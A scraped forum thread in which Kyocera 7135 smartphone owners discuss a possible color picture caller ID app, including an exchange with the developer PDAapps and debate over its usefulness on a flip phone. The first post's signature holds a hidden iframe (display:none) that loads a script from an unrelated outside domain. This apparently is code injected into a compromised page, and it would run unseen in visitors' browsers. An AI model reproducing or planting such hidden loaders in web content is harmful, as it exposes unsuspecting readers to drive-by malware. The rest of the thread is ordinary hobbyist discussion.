+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Color "Photo Caller ID" possible for the 7135?

I know that hackers have created a "photo caller ID" for the color Samsung I300 (right 'nixx?). Do we think that it will be possible for this phone? I know that they are planning on releasing the SDK when the phone comes out. Would it work if one of you talented programmers/hackers got a head start by creating one with the 6035 SDK and then tweaked it for the 7135 to save time? Or you probably would have to wait for the correct SDK.

What do we think, a color photo caller ID for the 7135? Let's get going on it!

Thanks,
    ~Markito <---- Who has never written a code in his life <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Color "Photo Caller ID" possible for the 7135?

I know that hackers have created a "photo caller ID" for the color Samsung I300 (right 'nixx?). Do we think that it will be possible for this phone? I know that they are planning on releasing the SDK when the phone comes out. Would it work if one of you talented programmers/hackers got a head start by creating one with the 6035 SDK and then tweaked it for the 7135 to save time? Or you probably would have to wait for the correct SDK.

What do we think, a color photo caller ID for the 7135? Let's get going on it!

Thanks,
    ~Markito &lt;--- Who has never written a code in his life
    It would indeed be too nice if KYO went ahead and added a photo field in the Address book and did this automatically. The 6035 API provides for hooking into incoming call signals, and I'd be shocked if this was not carried over. One would have to create a database of photos ties to phone numbers, and show the photo if the flip was open while ringing.

Registered User All-Purpose Guru's Avatar

Re: Color "Photo Caller ID" possible for the 7135?

[quote:f0db005e21="rlwhitt"]It would indeed be too nice if KYO went ahead and added a photo field in the Address book and did this automatically. The 6035 API provides for hooking into incoming call signals, and I'd be shocked if this was not carried over. One would have to create a database of photos ties to phone numbers, and show the photo if the flip was open while ringing.[/quote:f0db005e21]

The Sony has a photo field in the address book, I believe.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

Excellent news. I just wrote to www.PDAapps.com (maker of "TreoPictureCallerID" &amp; "I300PictureCallerID"). He got back to me within MINUTES (at 1am!) Here is what transpired...

-----------------------------
    Dear PDAapps,

I have never used your products, because I don't have a Treo or I300 (I am a happy Kyocera 6035 owner). But I am impressed with your work.

As you probably already know, Kyocera's amazing follow up to the 6035, the "7135" Smartphone (and SDK) will be released in October or November.
    See...

http://www.kyocera-wireless.com/showroom/showcase/coming_soon.htm

It will have a beautiful color screen and of course will have caller ID. I
    am writing to encourage you to create a "7135PictureCallerID" as soon as
    you can. This PDA/Phone promises to be hugely popular and an app like that would be VERY well received.

Thank you so much,
    ~Markito

---------------------------------

Markito,

Absolutely. A picture caller ID for the Kyo by PDAapps will be done.

Now, we just have to figure out how to get hold of a 7135 early in the game.

Thanks.
    PDAapps

Great news, eh?

I guess I don't see the big need for Photo Caller ID on this phone.

Since it doesn't allow you to see the screen and has an external caller ID, you will already know who's calling before you even open the phone.

I guess if you leave you're phone sitting around open all the time in it's creadle than this might be useful...
    ... M A L I A L ...
    ... designer | mac OS X | windows XP ...
    ... email

... waiting for the big
    V to wake up and smell the smartphone....

It's the geek factor! We just want it because we can. Besides, it's fun to see a friend's photo when you open the clam shell phone while it's ringing.

I guess I don't see the big need for Photo Caller ID on this phone.
    yea, I'd probably set mine such that opening up the clam would answer the call.

It does sound cool, but I have a hard enough time keeping up with numbers for people.

I don't think I have any time to create lil' "phone size" .jpgs or .pngs of all my pals to put in there.

I am happy being a utilitarian smartphone user.
    It "just works" for all my needs.
    But then again, I'm not much on hackmaster type things either.
    Basic tools that sync well with the desktop...

I do wish they would retune the PalmOS clipboard and memo pad size limit issue.
    Palm's official answer is "It is that size to promote =smart= memory utilization so the Platform runs fast".
    Um, ok....
    One time we were slapping eachother with meat, the next day it got wierd!

cool factor

It's the geek factor! We just want it because we can. Besides, it's fun to see a friend's photo when you open the clam shell phone while it's ringing.
    Exactly... it's not the most "practical" app in the world, but is sure is cool I'm planning on using it. Being able to use MP3's as ringtones also isn't necessary, but I hope that we will be able to!
    i want it!
    just "because we can"...
    sorta like my turbo new beetle (titanium iBug) will go at least 135mph. it's not practical, but i like knowing it's there.

Very :coolquick Idea!

I'd Like to improve it to add a default picture for unknown numbers based on thier area code & Prefix- That way It could narrow down the possibilities of who the unknown number is very quickly.
    iPhone therefore iAm.

Of course we don't NEED photo ID. We also don't NEED a $500+ PalmOS/Phone combo. Victims of techno/marketing/geek culture, we just wants it. C'mon, photoID, way way way cool.

(PS - Please do not mention to my wife that "we don't NEED" line. The official cover story in this household is "honey, I really do need that new phone/PDA combo", and I'm sticking to it.)

I used Picture Caller ID on my i300 until yesterday, problem is it eats up the memory pretty fast, so I took it out. I gotta say that it works great, the moment the phone starts ringing, the picture is on the screen, not like a problem I read on some other threads were 6035 owners, using distinctive ring tones for people, had delays before it would actually start using the distinctive tone.

Jorge

Does anybody with a 6035 have a quick way to look up numbers online from the call history to find out an unknown number? and then add that name to the address book just as effortlessly from such a website?

If not that would be cool- maybe during a hotsync, a conduit or some program could compare the call history to the addressbook and for any numbers not found, grab the info from an online whitepages and stick it in an "incoming" or "recent" category in the palms addressbook. When you put your palm onthe cradle for the night, it could do this for all of the calls you had that day.
    iPhone therefore iAm.

"7135PictureCallerID"

Originally posted by Markito
    Excellent news. I just wrote to www.PDAapps.com (maker of "TreoPictureCallerID" &amp; "I300PictureCallerID"). He got back to me within MINUTES (at 1am!) Here is what transpired...

-----------------------------
    Dear PDAapps,

I have never used your products, because I don't have a Treo or I300 (I am a happy Kyocera 6035 owner). But I am impressed with your work.

As you probably already know, Kyocera's amazing follow up to the 6035, the "7135" Smartphone (and SDK) will be released in October or November.
    See...

http://www.kyocera-wireless.com/show...oming_soon.htm

It will have a beautiful color screen and of course will have caller ID. I
    am writing to encourage you to create a "7135PictureCallerID" as soon as
    you can. This PDA/Phone promises to be hugely popular and an app like that would be VERY well received.

Thank you so much,
    ~Markito

Markito,

Absolutely. A picture caller ID for the Kyo by PDAapps will be done.

Now, we just have to figure out how to get hold of a 7135 early in the game.

Thanks.
    PDAapps

Great news, eh?

Please help keep this one alive, now that the phone is available, let's all put pressure on to get this created.

Administrator
    wont get created until they get a phone to test.

Originally posted by marctronixx
    wont get created until they get a phone to test.
    And probably the 7135 SDK gets released, although I am willing to bet that the call notification/information functions are going to be the same as the 6035.

Alan

Administrator
    well, the pdaapps guys/gals are pretty good and reverse engineering.. they made an awful lot of tools for the i300 which had no SDK.. so im sure they will have a ball with the 7135...

Administrator
    Originally posted by marctronixx
    well, the pdaapps guys/gals are pretty good on reverse engineering.. they made an awful lot of tools for the i300 which had no SDK.. so im sure they will have a ball with the 7135...

Thanks for bumping this one back up. Yeah, this would be really fun to have.
    ~'kito
    pdaPhoneHome Moderator

OK, I can see the point of a Picture caller ID on a NON-flip phone....but it's it pointless to have on a flip phone since you already know the caller from the top of the phone's external LCD? Seems kinda dumb for this phone.